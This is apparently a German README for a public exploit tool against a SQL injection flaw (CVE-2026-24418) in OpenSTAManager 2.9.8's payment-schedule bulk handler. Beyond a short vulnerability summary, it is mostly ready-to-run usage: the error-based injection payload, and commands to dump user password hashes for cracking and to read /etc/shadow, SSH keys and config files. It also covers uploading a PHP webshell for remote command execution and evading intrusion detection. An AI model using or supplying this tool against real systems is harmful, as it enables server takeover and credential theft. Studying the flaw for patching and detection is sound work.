
OpenSTAManager v2.9.8 und frühere Versionen enthalten eine kritische fehlerbasierte SQL-Injection-Schwachstelle im Bulk-Operations-Handler des Moduls Scadenzario (Zahlungsplan).
OpenSTAManager <= 2.9.8 — Fehlerbasierte SQL-Injection im Scadenzario-Massenverarbeitungsmodul
| Feld | Details |
|---|---|
| CVE ID | CVE-2026-24418 |
| Schweregrad | HOCH (8.8) |
| CWE | CWE-89: SQL-Injection |
| Betroffene Versionen | OpenSTAManager <= 2.9.8 |
| Angreifbarer Parameter | id_records[] (POST-Array) |
| Angreifbarer Endpunkt | /actions.php?id_module=18 |
| Angriffstyp | Fehlerbasierte SQL-Injection (EXTRACTVALUE) |
| Authentifizierung | Erforderlich (jeder gültige Benutzeraccount) |
OpenSTAManager v2.9.8 und frühere Versionen enthalten eine kritische fehlerbasierte SQL-Injection-Schwachstelle im Massenverarbeitungs-Handler für das Scadenzario-Modul (Zahlungsplan). Die Anwendung validiert nicht, ob die Elemente des id_records[]-Arrays Ganzzahlen sind, bevor sie in einer SQL IN()-Klausel verwendet werden, sodass authentifizierte Angreifer beliebige SQL-Befehle einschleusen und sensible Daten über XPATH-Fehlermeldungen extrahieren können.
/actions.php empfängt id_records[] über POSTarray_clean() entfernt nur leere Werte, validiert KEINE Datentypen/modules/scadenzario/bulk.php übergibt unbereinigte Werte direkt in eine SQL IN()-Klausel| Funktion | Beschreibung |
|---|---|
--info | Datenbankserver-Fingerprinting (Version, Benutzer, Hostname, OS, Pfade) |
--privs | MySQL-Berechtigungsaufzählung (FILE, SUPER, PROCESS) |
--users | Vollständiger Credential-Dump von zz_users mit automatischem Hash-Export |
--dbs | Alle zugänglichen Datenbanken aufzählen |
--tables | Tabellen mit Zeilenanzahlen auflisten |
--columns | Spalten mit Typen und Null-Informationen auflisten |
--dump | Datenextraktion aus beliebigen Tabellen/Spalten |
--sql | Ausführung benutzerdefinierter SQL-Abfragen |
--file-read | Lesen von Serverdateien via LOAD_FILE() (/etc/passwd, Konfigurationsdateien, SSH-Schlüssel) |
--file-read-hex | HEX-kodiertes Dateilesen zum Umgehen von Filtern |
--webshell | Hochladen einer PHP-Webshell via INTO DUMPFILE |
--rce | Interaktive Befehlsausführung über hochgeladene Webshell |
-o / --output | Alle Ergebnisse in JSON, CSV und Hashcat/John-Formate speichern |
--proxy | HTTP-Proxy-Unterstützung (Burp Suite) |
--delay | Anforderungsverzögerung zur IDS/WAF-Umgehung |
git clone https://github.com/BridgerAlderson/CVE-2026-24418.git
cd CVE-2026-24418
pip install requests
# Login with credentials
python3 exploit.py -t http://target.com -u admin -p password --info
# Use existing session cookie
python3 exploit.py -t http://target.com -c <PHPSESSID_VALUE> --info
# Database info + privileges + user credentials
python3 exploit.py -t http://target.com -u admin -p secret --all
# Check MySQL privileges (FILE, SUPER, etc.)
python3 exploit.py -t http://target.com -u admin -p secret --privs
# Dump users and auto-export hashes
python3 exploit.py -t http://target.com -u admin -p secret --users -o ./loot
# Output files:
# ./loot/users.json - Full user data
# ./loot/users.csv - CSV format
# ./loot/hashes_hashcat.txt - Hashcat format (mode 3200)
# ./loot/hashes_john.txt - John format (user:hash)
# List all databases
python3 exploit.py -t http://target.com -u admin -p secret --dbs
# List tables in a specific database
python3 exploit.py -t http://target.com -u admin -p secret --tables -D openstamanager
# List columns of a table
python3 exploit.py -t http://target.com -u admin -p secret --columns -T zz_users
# Dump specific columns with row limit
python3 exploit.py -t http://target.com -u admin -p secret --dump -T zz_users -C username,password --limit 10
# Read /etc/passwd
python3 exploit.py -t http://target.com -u admin -p secret --file-read /etc/passwd
# Read application config (database credentials)
python3 exploit.py -t http://target.com -u admin -p secret --file-read /var/www/html/openstamanager/config.inc.php
# Read SSH keys
python3 exploit.py -t http://target.com -u admin -p secret --file-read /home/user/.ssh/id_rsa
# HEX mode (bypass character filters)
python3 exploit.py -t http://target.com -u admin -p secret --file-read-hex /etc/shadow
# Upload webshell (auto-detects webroot)
python3 exploit.py -t http://target.com -u admin -p secret --webshell
# Upload webshell with specific webroot
python3 exploit.py -t http://target.com -u admin -p secret --webshell --webroot /var/www/html
# Interactive shell session
python3 exploit.py -t http://target.com -u admin -p secret --rce
# RCE will auto-upload webshell if none exists
# Save everything to a directory
python3 exploit.py -t http://target.com -u admin -p secret --all -o ./loot
# Generated files:
# db_info.json, privileges.json, users.json, users.csv,
# hashes_hashcat.txt, hashes_john.txt
# Through Burp Suite proxy
python3 exploit.py -t http://target.com -u admin -p secret --users --proxy http://127.0.0.1:8080
# With request delay (2 seconds between requests)
python3 exploit.py -t http://target.com -u admin -p secret --users --delay 2
# Skip SSL verification
python3 exploit.py -t https://target.com -u admin -p secret --info -k
Ziel: -t, --target Basis-URL des Ziels
Authentifizierung: -u, --user Benutzername für die Anmeldung -p, --password Passwort für die Anmeldung -c, --cookie Vorhandener PHPSESSID-Wert
Aufzählung: -D, --database Name der Zieldatenbank -T, --table Name der Zieltabelle -C, --columns-list Auszulesende Spalten (kommagetrennt) --limit Zeilenbegrenzung für Dumps
Aktionen: --info Datenbankserver-Informationen --users Anmeldedaten von zz_users auslesen --dbs Datenbanken aufzählen --tables Tabellen auflisten --columns Spalten auflisten (erfordert -T) --dump Daten auslesen (erfordert -T und -C) --sql QUERY Benutzerdefinierte SQL-Abfrage --all --info + --privs + --users ausführen --privs MySQL-Berechtigungen prüfen
Dateioperationen: --file-read PATH Datei via LOAD_FILE() lesen --file-read-hex PATH Datei via HEX-Kodierung lesen
Remote-Code-Ausführung: --webshell PHP-Webshell hochladen --webroot PATH Webroot-Pfad für den Shell-Upload --rce Interaktive Befehlsausführung
Ausgabe: -o, --output DIR Ergebnisse im Verzeichnis speichern
Netzwerk: -m, --module-id Modul-ID (Standard: 18) --proxy HTTP-Proxy-URL -k, --no-ssl-verify SSL-Überprüfung deaktivieren --delay Anforderungsverzögerung in Sekunden
id_records[]=-999) AND EXTRACTVALUE(1,CONCAT(0x7e,(<SQL_QUERY>)))#
MySQLs EXTRACTVALUE() gibt maximal ~32 Zeichen über XPATH-Fehler zurück. Das Tool teilt lange Ergebnisse automatisch mit SUBSTRING() in Blöcke:
SUBSTRING((<query>), 1, 31) -- Chunk 1
SUBSTRING((<query>), 32, 31) -- Chunk 2
...